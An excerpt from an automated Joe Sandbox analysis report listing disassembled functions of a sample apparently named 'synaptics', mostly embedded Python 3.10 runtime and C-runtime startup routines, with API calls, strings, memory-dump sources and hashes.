                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                      • Opcode ID: c717646268a274578d0167127197bf5e9e3ff762a935a659d995c872277b55d1
                                                                                                                                                                                                      • Instruction ID: 1da4af02236b86a643dad30e52b5445ec6d652298117261dc09d603449b9ecb5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c717646268a274578d0167127197bf5e9e3ff762a935a659d995c872277b55d1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3B0123004020C67CF002B45FC054153B2CAB01939B084030FD1D04111E733B67085CB

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 6C4E0CA0 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 412COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,00000200), ref: 6C4E0D41
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(?), ref: 6C4E0E94
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000000,?), ref: 6C4E0E9E
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,?,00000000), ref: 6C4E0EBA
                                                                                                                                                                                                      • _Py_NewReference.PYTHON310(00000000), ref: 6C4E0FB7
                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?,00000000), ref: 6C4E1006
                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000000,?,000000FF,?,00000000), ref: 6C4E1015
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C4C8,00000000), ref: 6C4E10ED
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,bad argument type for built-in operation), ref: 6C4E1105
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet), ref: 6C4E112D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Out of memory and PyExc_MemoryError is not initialized yet, xrefs: 6C4E1123
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C4E10F9
                                                                                                                                                                                                      • _PyErr_NoMemory, xrefs: 6C4E1128
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memset$Err_FromLongLong_$Dict_ErrorFatalFuncItemObjectReferenceString
                                                                                                                                                                                                      • String ID: Out of memory and PyExc_MemoryError is not initialized yet$_PyErr_NoMemory$bad argument type for built-in operation
                                                                                                                                                                                                      • API String ID: 2908353227-2850839641
                                                                                                                                                                                                      • Opcode ID: e6cf5bbc820761079dc81f958d26a7a30b865f955fb63a3563c2bef684943748
                                                                                                                                                                                                      • Instruction ID: f5b965f4c01ab9492877a687c6d3def97677d11859594570234380372ff9e585
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6cf5bbc820761079dc81f958d26a7a30b865f955fb63a3563c2bef684943748
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31E14B716083818FD714CF2CC801EA9B7F0EF8931AF154A6DE8A58BB91D730D946DB92
                                                                                                                                                                                                      Function 6C571BF0 Relevance: 21.0, APIs: 2, Strings: 10, Instructions: 19COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(tags/v3.10.11:7d4cc5a, Apr 5 2023, 00:20:04,0000004A,%s%s%s, %.20s, %.9s,tags/v3.10.11,6C6EC33C,7d4cc5a,Apr 5 2023,00:20:04), ref: 6C571C15
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(3.10.11 (tags/v3.10.11:7d4cc5a, Apr 5 2023, 00:20:04) [MSC v.1929 32 bit (Intel)],000000FA,%.80s (%.80s) %.80s,3.10.11,tags/v3.10.11:7d4cc5a, Apr 5 2023, 00:20:04,[MSC v.1929 32 bit (Intel)],tags/v3.10.11:7d4cc5a, Apr 5 2023, 00:20:04,0000004A,%s%s%s, %.20s, %.9s,tags/v3.10.11,6C6EC33C,7d4cc5a,Apr 5 2023,00:20:04), ref: 6C571C38
                                                                                                                                                                                                        • Part of subcall function 6C583E20: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,?,6C4B751D,?,000003E8,Cannot create a consistent method resolutionorder (MRO) for bases,00000000,00000000), ref: 6C583E5F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: S_snprintf$__stdio_common_vsprintf
                                                                                                                                                                                                      • String ID: %.80s (%.80s) %.80s$%s%s%s, %.20s, %.9s$00:20:04$3.10.11$3.10.11 (tags/v3.10.11:7d4cc5a, Apr 5 2023, 00:20:04) [MSC v.1929 32 bit (Intel)]$7d4cc5a$Apr 5 2023$[MSC v.1929 32 bit (Intel)]$tags/v3.10.11$tags/v3.10.11:7d4cc5a, Apr 5 2023, 00:20:04
                                                                                                                                                                                                      • API String ID: 2836613592-224125154
                                                                                                                                                                                                      • Opcode ID: decc3278379776d0e19044fc2672783b302dccaade0482bd105dd5a875cd9e8c
                                                                                                                                                                                                      • Instruction ID: 9299385faf48f79473a4e5a317b897b7c4d95ec0779b7b112ec2d12983443344
                                                                                                                                                                                                      • Opcode Fuzzy Hash: decc3278379776d0e19044fc2672783b302dccaade0482bd105dd5a875cd9e8c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48D0C9A03C939470AA2130549F06F891952977163BF886C107A1AB9D82A55CFB0E62BE
                                                                                                                                                                                                      Function 6C483AD0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 234COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • frexp.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C483B3A
                                                                                                                                                                                                      • ldexp.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C483B9D
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BD78,00000000,00000000,00000000,00000000), ref: 6C483CA0
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C9A8,00000000,00000000,00000000,00000000), ref: 6C483D36
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • float too large to pack with d format, xrefs: 6C483C89
                                                                                                                                                                                                      • frexp() result out of range, xrefs: 6C483D1F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Object$frexpldexp
                                                                                                                                                                                                      • String ID: float too large to pack with d format$frexp() result out of range
                                                                                                                                                                                                      • API String ID: 2797603105-471396154
                                                                                                                                                                                                      • Opcode ID: bab5e57a6b920426ceb7f317657118f72de46857fd6a4b8a9a70725b4d377044
                                                                                                                                                                                                      • Instruction ID: 77b53dee50b3a158fd4d3ee3057e6bd325aed336fabba952326308930c07df47
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bab5e57a6b920426ceb7f317657118f72de46857fd6a4b8a9a70725b4d377044
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F591237060A7448BC706CF38C811B5ABBB5AF96354F08876EF899EB792D730D446C792
                                                                                                                                                                                                      Function 00541710 Relevance: 9.1, APIs: 6, Instructions: 73COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0054171C
                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000003), ref: 00541742
                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000050), ref: 005417CC
                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 005417E8
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00541808
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00541812
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2397056113.0000000000541000.00000020.00000001.01000000.00000008.sdmp, Offset: 00540000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397019641.0000000000540000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397103659.0000000000542000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397137864.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_540000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1045392073-0
                                                                                                                                                                                                      • Opcode ID: 738bd492f0c8cd2b74df67345021ca41bd6bb65169ef859f0dc734c1f05c66e5
                                                                                                                                                                                                      • Instruction ID: c28cae7c9aad6d92b02a3bcce430f325e35ba06e41b3226e72f464351b984d63
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 738bd492f0c8cd2b74df67345021ca41bd6bb65169ef859f0dc734c1f05c66e5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF312779D4121D9BDB21DFA0D989BCCBBF8BF18304F1040AAE40CAB250EB719A85DF45
                                                                                                                                                                                                      Function 005419E7 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005419FD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2397056113.0000000000541000.00000020.00000001.01000000.00000008.sdmp, Offset: 00540000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397019641.0000000000540000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397103659.0000000000542000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397137864.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_540000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                                      • Opcode ID: 82ad9fc1bed079c0533453db4c31f7c3096acdb05205fc372f92313c5b2b0b7f
                                                                                                                                                                                                      • Instruction ID: 8b6aa0e5d34eb68a87af22df3cc0bf6e746d9e8e830225a1e54d568748eecfa4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82ad9fc1bed079c0533453db4c31f7c3096acdb05205fc372f92313c5b2b0b7f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0551B1719006158BDB14CF69D8893E9BFF0FB48308F24C96AD415EB360D3759A84DF90
                                                                                                                                                                                                      Function 005418A7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000018B6,005410E5), ref: 005418AC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2397056113.0000000000541000.00000020.00000001.01000000.00000008.sdmp, Offset: 00540000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397019641.0000000000540000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397103659.0000000000542000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2397137864.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_540000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: c496958052a1e9416e8c37c5714260431f1f4d118c3c5a1a3798ba0e45a40b94
                                                                                                                                                                                                      • Instruction ID: 066ba794e23aca01932c231c55cb024af0047fe33276a800e41b134ac45d49c6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c496958052a1e9416e8c37c5714260431f1f4d118c3c5a1a3798ba0e45a40b94
                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                      Function 6C4C7E70 Relevance: 115.9, APIs: 34, Strings: 32, Instructions: 371COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,PyType_HasFeature((((PyObject*)(op))->ob_type), (1UL << 28)),D:\a\1\s\Objects\unicodeobject.c,00000202,_PyUnicode_CheckConsistency), ref: 6C4C80D9
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,kind == PyUnicode_1BYTE_KIND,D:\a\1\s\Objects\unicodeobject.c,00000208,_PyUnicode_CheckConsistency,?,00000000,PyType_HasFeature((((PyObject*)(op))->ob_type), (1UL << 28)),D:\a\1\s\Objects\unicodeobject.c,00000202,_PyUnicode_CheckConsistency), ref: 6C4C80F5
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,ascii->state.ready == 1,D:\a\1\s\Objects\unicodeobject.c,00000209,_PyUnicode_CheckConsistency,?,00000000,kind == PyUnicode_1BYTE_KIND,D:\a\1\s\Objects\unicodeobject.c,00000208,_PyUnicode_CheckConsistency,?,00000000,PyType_HasFeature((((PyObject*)(op))->ob_type), (1UL << 28)),D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C8111
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,kind == PyUnicode_1BYTE_KIND || kind == PyUnicode_2BYTE_KIND || kind == PyUnicode_4BYTE_KIND,D:\a\1\s\Objects\unicodeobject.c,00000213,_PyUnicode_CheckConsistency,?,00000000,ascii->state.ready == 1,D:\a\1\s\Objects\unicodeobject.c,00000209,_PyUnicode_CheckConsistency,?,00000000,kind == PyUnicode_1BYTE_KIND,D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C812D
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,ascii->state.ascii == 0,D:\a\1\s\Objects\unicodeobject.c,00000214,_PyUnicode_CheckConsistency,?,00000000,kind == PyUnicode_1BYTE_KIND || kind == PyUnicode_2BYTE_KIND || kind == PyUnicode_4BYTE_KIND,D:\a\1\s\Objects\unicodeobject.c,00000213,_PyUnicode_CheckConsistency,?,00000000,ascii->state.ready == 1,D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C8149
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,ascii->state.ready == 1,D:\a\1\s\Objects\unicodeobject.c,00000215,_PyUnicode_CheckConsistency,?,00000000,ascii->state.ascii == 0,D:\a\1\s\Objects\unicodeobject.c,00000214,_PyUnicode_CheckConsistency,?,00000000,kind == PyUnicode_1BYTE_KIND || kind == PyUnicode_2BYTE_KIND || kind == PyUnicode_4BYTE_KIND,D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C8165
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,compact->utf8 != data,D:\a\1\s\Objects\unicodeobject.c,00000216,_PyUnicode_CheckConsistency,?,00000000,ascii->state.ready == 1,D:\a\1\s\Objects\unicodeobject.c,00000215,_PyUnicode_CheckConsistency,?,00000000,ascii->state.ascii == 0,D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C8181
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,ascii->wstr == data,D:\a\1\s\Objects\unicodeobject.c,0000023F,_PyUnicode_CheckConsistency,?,00000000,compact->utf8 != data,D:\a\1\s\Objects\unicodeobject.c,00000216,_PyUnicode_CheckConsistency,?,00000000,ascii->state.ready == 1,D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C819D
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,ascii->length == 0,D:\a\1\s\Objects\unicodeobject.c,0000021D,_PyUnicode_CheckConsistency,?,00000000,ascii->wstr == data,D:\a\1\s\Objects\unicodeobject.c,0000023F,_PyUnicode_CheckConsistency,?,00000000,compact->utf8 != data,D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C81B9
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,ascii->hash == -1,D:\a\1\s\Objects\unicodeobject.c,0000021E,_PyUnicode_CheckConsistency,?,00000000,ascii->length == 0,D:\a\1\s\Objects\unicodeobject.c,0000021D,_PyUnicode_CheckConsistency,?,00000000,ascii->wstr == data,D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C81D5
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,ascii->state.ascii == 0,D:\a\1\s\Objects\unicodeobject.c,00000220,_PyUnicode_CheckConsistency,?,00000000,ascii->hash == -1,D:\a\1\s\Objects\unicodeobject.c,0000021E,_PyUnicode_CheckConsistency,?,00000000,ascii->length == 0,D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C81F1
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,ascii->state.ready == 0,D:\a\1\s\Objects\unicodeobject.c,00000221,_PyUnicode_CheckConsistency,?,00000000,ascii->state.ascii == 0,D:\a\1\s\Objects\unicodeobject.c,00000220,_PyUnicode_CheckConsistency,?,00000000,ascii->hash == -1,D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C820D
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,ascii->state.interned == 0,D:\a\1\s\Objects\unicodeobject.c,00000222,_PyUnicode_CheckConsistency,?,00000000,ascii->state.ready == 0,D:\a\1\s\Objects\unicodeobject.c,00000221,_PyUnicode_CheckConsistency,?,00000000,ascii->state.ascii == 0,D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C8229
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,ascii->wstr != ((void *)0),D:\a\1\s\Objects\unicodeobject.c,00000223,_PyUnicode_CheckConsistency,?,00000000,ascii->state.interned == 0,D:\a\1\s\Objects\unicodeobject.c,00000222,_PyUnicode_CheckConsistency,?,00000000,ascii->state.ready == 0,D:\a\1\s\Objects\unicodeobject.c), ref: 6C4C8245
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AssertFailedObject_
                                                                                                                                                                                                      • String ID: ((Py_UCS4) ((kind) == PyUnicode_1BYTE_KIND ? ((const Py_UCS1 *)(data))[(ascii->length)] : ((kind) == PyUnicode_2BYTE_KIND ? ((const Py_UCS2 *)(data))[(ascii->length)] : ((const Py_UCS4 *)(data))[(ascii->length)] ) )) == 0$D:\a\1\s\Objects\unicodeobject.c$PyType_HasFeature((((PyObject*)(op))->ob_type), (1UL << 28))$_PyUnicode_CheckConsistency$ascii->hash == -1$ascii->length == 0$ascii->state.ascii == 0$ascii->state.interned == 0$ascii->state.ready == 0$ascii->state.ready == 1$ascii->wstr != ((void *)0)$ascii->wstr != data$ascii->wstr == data$compact->utf8 != data$compact->utf8 == ((void *)0)$compact->utf8 == data$compact->utf8_length == 0$compact->utf8_length == ascii->length$compact->wstr_length == 0$compact->wstr_length == ascii->length$data != ((void *)0)$data == ((void *)0)$kind == PyUnicode_1BYTE_KIND$kind == PyUnicode_1BYTE_KIND || kind == PyUnicode_2BYTE_KIND || kind == PyUnicode_4BYTE_KIND$maxchar < 128$maxchar <= 0x10ffff$maxchar <= 0xFFFF$maxchar <= 255$maxchar >= 0x100$maxchar >= 0x10000$maxchar >= 128$utf-8
                                                                                                                                                                                                      • API String ID: 2495115322-2177997107
                                                                                                                                                                                                      • Opcode ID: 688faf03b76cb1babf9f612290e97e8b22b1a942fa3b28342376745e92f751af
                                                                                                                                                                                                      • Instruction ID: b98d19ee26dc8290689b36dbfd2795d646a62e2cd13c8150eb5a25dd001a1fa3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 688faf03b76cb1babf9f612290e97e8b22b1a942fa3b28342376745e92f751af
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAB1A1F07C470039E122D6219F46F7572D44764B0FFA08E19B760BFFD68A65E60A8369
                                                                                                                                                                                                      Function 6C4F2E20 Relevance: 82.6, APIs: 43, Strings: 4, Instructions: 387threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000000,?,6C4F344A,00000000,?,?), ref: 6C4F2E4A
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2E58
                                                                                                                                                                                                      • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2E75
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2E89
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2E90
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2E9A
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C535380,?,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2EAA
                                                                                                                                                                                                      • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?,?), ref: 6C4F2EB2
                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4F344A,00000000,?), ref: 6C4F2EDD
